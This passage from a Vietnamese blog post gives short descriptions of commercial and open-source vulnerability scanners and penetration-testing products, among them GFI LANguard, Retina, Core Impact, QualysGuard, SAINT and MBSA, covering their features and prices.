Một phần mềm thương mại viết cho môi trường Windows sử dụng để Scan lỗ hổng bảo mật.

GFILANguard tự động Scan mạng IP để phát hiện những máy tính nào đang hoạt động. Sau đó cố gắng đoán biết hệ điều hành, và các ứng dụng đang chạy trên những máy đó. Sau đó cố gắng tổng hợp những máy tính dính những lỗ hổng bảo mật chung, mức độ bảo mật, Access Point, USB Device, và các thư mục share, nhưng Port đang mở và sử dụng, những dịch vụ đang chạy, lỗ hổng bảo mật trên chúng. Thực hiện kiểm tra toàn bộ Registry, thiết lập mật khẩu, users, group và nhiều thông tin khác. Kết quả Scan được lưu dưới dạng file HTML, cho phép lọc lấy các thông tin cần thiết. Nó cũng bao gồm một tính năng quản lý các bản vá lỗi, cho phép bạn phát hiện những bản vá lỗi bạn chưa cập nhật hay cài bị lỗi.
Một phiên bản miễn phí với tính năng khá hạn chế và chỉ sử dụng được trong 30 ngày.

3. Retina Network Vulerability Scanner.
Một phiên bản thương mại được phát triển bởi eEye.
Tương tự như Nessus, các tính năng của Rentina có thể scan tất cả các host mà nó tìm thấy được.Tôi biết được người viết eEye là công ty rất am hiểm về Security.

4. Core Impact
Một công cụ tự động và thực hiện penetration testing.

Core Impact không hề rẻ chút nào – một phiên bản hiện nay giá khoảng 10.000 USD. Nhưng nó được quan tâm là một công cụ để khai thác các lỗ hổng hơn là tìm kiếm các lỗ hổng. Có khả năng tự động cập nhật những cách khai thác lỗ hổng bảo mật (Exploits), cùng với một đội ngũ các nhà bảo mật chuyên nghiệp viết lên các đoạn Exploit. Nếu bạn không thể tìm kiếm được Impact thì có một giải pháp rẻ hơn đó là Canvas hay một chương trình vô cùng hiệu quả để khai thác các lỗ hổng bảo mật miễn phí đó là Metasploit Framework.

5. ISS Internet Scanner
Là một chương trình Scan những lỗ hổng bảo mật tại tầng Application.
Internet Scanner được phát triển bắt đầu từ năm 1992 là một phần mềm mã nguồn mở nhỏ viết bởi Christospher Klaus. Hiện nay được phát triển thành ISS với thu nhập hàng tỷ USD hàng năm và hoạt động trên lĩnh vực Security.

6. X-scan
Thực hiện các phương pháp để Scan các lỗ hổng bảo mật trên mạng.

Nhiều tính năng và các plug-in hỗ trợ trong quá trình scan các lỗ hổng bảo mật. X-scan bao gồm nhiều tính năng bao gồm hỗ trợ toàn bộ cho NASL, phát hiện các dịch vụ chạy, đoán biết hệ điều hành và phiên bản, tính trạng password/user và nhiều thông tin khác. Đây là một chương trình được phát triển bởi đọi ngũ phần mềm của Trung Quốc.

7. Sara – Security Auditor Research Assistant.
SARA là một công cụ kiểm tra các lỗ hổng bảo mật rất hiệu quả, họ cố gắng cập nhật phiên bản mới sau mooiix hai tháng và được phát triển bởi đội ngũ mã nguồn mở.

8. QualysGuard
Một phần mềm scan với giao diện quản trị là Web Applications

Được phát triển và cập nhật những kiểu scan, những phần mềm, hệ điều hành, và các dịch vụ. Đảm bảo luôn có kết quả đầy đủ và chính xác nhất. Client có thể dễ dàng kiểm tra bảo mật với QualyGuard trên nền tảng Web. Với hơn 5000 tính năng cho phép kiểm tra các lỗ hổng bảo mật, các cổng và thực hiện scan một cách thông minh. Tự động update hàng ngày với những thông tin mới nhất từ những nghiên cứu của QualysGuard.

9. SAINT – Security Administrator’s Integrated Network Tool.
Được biết đến như một phần mềm thương mại để Scan các lỗ hổng bảo mật tương tự như Nessus, ISS Internet Scanner hay Retina. Được chạy trên nền UNIX sử dụng miễn phí và các hệ điều hành mã nguồn mở, nhưng hiện nay đã có bản thương mại với đầy đủ tính năng và sự hỗ trợ từ nhà phát triển.

10. MBSA – Microsoft Baseline Security Analyzer
MBSA là một tools rất rễ sử dụng được thiết kế cho những nhà quản trị chuyên nghiệp giúp những môi trường nhỏ và vừa đảm bảo tình trạng an ninh của họ luôn đạt mức mà Microsoft khuyến cáo. Tích hợp tính năng Windows Update Agen và Microsoft Update Service, MBSA chắc chắn sẽ là một phần mềm quản lý các sản phẩm của Microsoft rất hiệu quả với tính năng cung cấp tự động update cho các Client hay Server thông qua Windows Server Update Service, System Managemetn Server (SMS) và Microsoft Operations Manager (MOM). Một hệ thống MBSA có thể quét 3 triệu máy tính trong vòng một tuần.

Một số công cụ hay cho Security

 
trial © 2015 - Designed by Templateism.com